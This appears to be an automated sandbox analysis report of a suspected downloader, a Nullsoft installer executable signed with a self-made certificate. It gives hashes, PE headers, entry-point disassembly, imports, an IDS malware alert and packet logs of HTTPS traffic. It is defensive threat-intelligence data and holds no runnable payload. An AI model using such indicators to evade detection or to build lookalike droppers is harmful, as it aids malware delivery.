                                                SHA1:D8DB917CC95435D80B446AA38B623377B39D9E18
                                                SHA-256:ABEC3A36956C827AE67D077F005B6CEAA616B58A4BE7202DEAC7058936AE8042
                                                SHA-512:FB8659401E24C2445B4718338E6FDEBD55A0CD2A783EAB278845582E959A2CB03E06C1D30E8144998819A8DA71129B4E58D1395122E4988E08EC71F6CF6B9D92
                                                Malicious:false
                                                Preview:L..................F........................................................?....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.i.s.a.n.n.e.x...A.n.d.3.7.$.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.547909639119886
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:LkzvfB4VFj.exe
                                                File size:892'576 bytes
                                                MD5:a5104b4d665dc081181fd163dce0bb77
                                                SHA1:e72855a64aace2ecf6aa008942e443d2ac7508d7
                                                SHA256:aa047fd2e21f33564c1178d063122fc9368afc5c6a5455c4381a3f5edde4b145
                                                SHA512:0ea16a9731ee607e601e385b69b860a80b81455a1279df9b2e81f1e6b879454ca1dda8ddb5dce70d610d21f4e16eba6a4d289ea18da17d354c63d97180126507
                                                SSDEEP:24576:DiGFaq43NvCkZsAFNgXDYRujTrl6foV0GSxnKSkAJ/QOeaI:DiGFu3Nv0AFTSd6foV0PxKSkAJ/qaI
                                                TLSH:F81512B2F240E86AD8298F724C5ED142DBE5BE1869142B9F3FE67F1A7D71060C10F646
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@
                                                Icon Hash:0e13672535353f1c
                                                Entrypoint:0x403348
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:ced282d9b261d1462772017fe2f6972b
                                                Signature Valid:false
                                                Signature Issuer:CN="Diaskopernes unboisterousness Lejemorderen ", E=Indaandendes6@Menubilledet.Gup, L=West Edmeston, S=New York, C=US
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
Not Before:09/02/2024 12:49:35
Not After:08/02/2027 12:49:35
                                                Subject Chain
                                                • CN="Diaskopernes unboisterousness Lejemorderen ", E=Indaandendes6@Menubilledet.Gup, L=West Edmeston, S=New York, C=US
                                                Version:3
                                                Thumbprint MD5:23ECB3AE0DB84F37E645DFECF9E00369
                                                Thumbprint SHA-1:7BBAA847C80C3FC9EEE3E7553C7728484F48024F
                                                Thumbprint SHA-256:40A2C2D67EED47AD53A368EF27A455144F4D61004EB513B02F398F3D0BA70D20
                                                Serial:09AF69515B952A9E5094BDF9D17A589BED2D6528
                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+18h], ebx
                                                mov dword ptr [esp+10h], 0040A198h
                                                mov dword ptr [esp+20h], ebx
                                                mov byte ptr [esp+14h], 00000020h
                                                call dword ptr [004080B8h]
                                                call dword ptr [004080BCh]
                                                and eax, BFFFFFFFh
                                                cmp ax, 00000006h
                                                mov dword ptr [0042F42Ch], eax
                                                je 00007F123C5FDA43h
                                                push ebx
                                                call 00007F123C600BA6h
                                                cmp eax, ebx
                                                je 00007F123C5FDA39h
                                                push 00000C00h
                                                call eax
                                                mov esi, 004082A0h
                                                push esi
                                                call 00007F123C600B22h
                                                push esi
                                                call dword ptr [004080CCh]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007F123C5FDA1Dh
                                                push 0000000Bh
                                                call 00007F123C600B7Ah
                                                push 00000009h
                                                call 00007F123C600B73h
                                                push 00000007h
                                                mov dword ptr [0042F424h], eax
                                                call 00007F123C600B67h
                                                cmp eax, ebx
                                                je 00007F123C5FDA41h
                                                push 0000001Eh
                                                call eax
                                                test eax, eax
                                                je 00007F123C5FDA39h
                                                or byte ptr [0042F42Fh], 00000040h
                                                push ebp
                                                call dword ptr [00408038h]
                                                push ebx
                                                call dword ptr [00408288h]
                                                mov dword ptr [0042F4F8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 00429850h
                                                call dword ptr [0040816Ch]
                                                push 0040A188h
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x41dd0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd8aa8 | 0x13f8 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6457 | 0x6600 | f6e38befa56abea7a550141c731da779 | False | 0.6682368259803921 | data | 6.434985703212657 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1380 | 0x1400 | 569269e9338b2e8ce268ead1326e2b0b | False | 0.4625 | data | 5.2610038973135005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x25538 | 0x600 | 17edd496e40111b5a48947c480fda13c | False | 0.4635416666666667 | data | 4.133728555004788 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x30000 | 0x28000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x58000 | 0x41dd0 | 0x41e00 | 51f103b856396aac282c5bd5a24beff1 | False | 0.6063619248102466 | data | 5.8960782160116745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x583b8 | 0x130ca | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.998410786148207
RT_ICON | 0x6b488 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.40775464332189754
RT_ICON | 0x7bcb0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.4554866512507883
RT_ICON | 0x85158 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | United States | 0.462218045112782
RT_ICON | 0x8b940 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4729667282809612
RT_ICON | 0x90dc8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.46835144071799717
RT_ICON | 0x94ff0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5149377593360995
RT_ICON | 0x97598 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5457317073170732
RT_ICON | 0x98640 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6073770491803279
RT_ICON | 0x98fc8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6719858156028369
RT_DIALOG | 0x99430 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x99530 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x99650 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x99718 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x99778 | 0x92 | Targa image data - Map 32 x 12490 x 1 +1 | English | United States | 0.7191780821917808
RT_VERSION | 0x99810 | 0x27c | data | English | United States | 0.5
RT_MANIFEST | 0x99a90 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
ADVAPI32.dll | RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll | SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll | IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll | ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll | SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll | SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll | GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-08T14:23:31.460462+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49762 | 142.250.72.110 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 8, 2024 14:23:30.988672972 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:30.988765955 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:30.988955975 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.003061056 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.003087997 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:31.231067896 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:31.231354952 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.232614994 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:31.232830048 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.268759012 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.268785000 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:31.269185066 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:31.269328117 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.272093058 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.316003084 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:31.460484028 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:31.460582972 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:31.460643053 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.460797071 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.461708069 CET | 49762 | 443 | 192.168.11.20 | 142.250.72.110
Nov 8, 2024 14:23:31.461729050 CET | 443 | 49762 | 142.250.72.110 | 192.168.11.20
Nov 8, 2024 14:23:31.601119041 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:31.601139069 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:31.601998091 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:31.601999044 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:31.602020025 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:31.833661079 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:31.833898067 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:31.833930016 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:31.839099884 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:31.839128017 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:31.839668036 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:31.839853048 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:31.840106964 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:31.884048939 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.041508913 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.041696072 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.041743040 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.056086063 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.056291103 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.056291103 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.056291103 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.071223021 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.071494102 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.071547031 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.071836948 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.144100904 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.144321918 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.144366980 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.144584894 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.147651911 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.147849083 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.147898912 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.148138046 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.156277895 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.156701088 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.156758070 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.157073021 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.162622929 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.162893057 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.162944078 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.163213968 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.170684099 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.170972109 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.171021938 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.171425104 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.177612066 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.177866936 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.177912951 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.178160906 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.185030937 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.185394049 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.185446024 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.185761929 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.196263075 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.196497917 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.196548939 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.196795940 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.199584007 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.199848890 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.199898958 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.200154066 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.206619978 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.206882000 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.206933022 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.207206011 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.217787027 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.218019009 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.218069077 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.218296051 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.220798016 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.221051931 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.221102953 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.221358061 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.227920055 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.228125095 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.228178024 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.228467941 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.240751028 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.241044044 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.241097927 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.241338968 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.247010946 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.247342110 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.247394085 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.247665882 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.249811888 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.250108004 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.250159979 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.250410080 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
Nov 8, 2024 14:23:34.258261919 CET | 443 | 49763 | 142.250.65.225 | 192.168.11.20
Nov 8, 2024 14:23:34.258497953 CET | 49763 | 443 | 192.168.11.20 | 142.250.65.225
                                                Nov 8, 2024 14:23:34.258549929 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.258841038 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.261485100 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.261734009 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.261786938 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.262015104 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.266053915 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.266294956 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.266346931 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.266563892 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.270962954 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.271167040 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.271174908 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.271223068 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.271403074 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.276802063 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.277029991 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.277081966 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.277318954 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.281096935 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.281317949 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.281337023 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.281573057 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.285475016 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.285661936 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.285679102 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.285883904 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.290333986 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.290517092 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.290539026 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.290723085 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.295388937 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.295653105 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.295670986 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.295928001 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.302630901 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.302867889 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.302886009 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.303185940 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.305270910 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.305494070 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.305510998 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.305696964 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.310107946 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.310389996 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.310406923 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.310610056 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.315072060 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.315332890 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.315350056 CET44349763142.250.65.225192.168.11.20
                                                Nov 8, 2024 14:23:34.315563917 CET49763443192.168.11.20142.250.65.225
                                                Nov 8, 2024 14:23:34.321193933 CET44349763142.250.65.225192.168.11.20
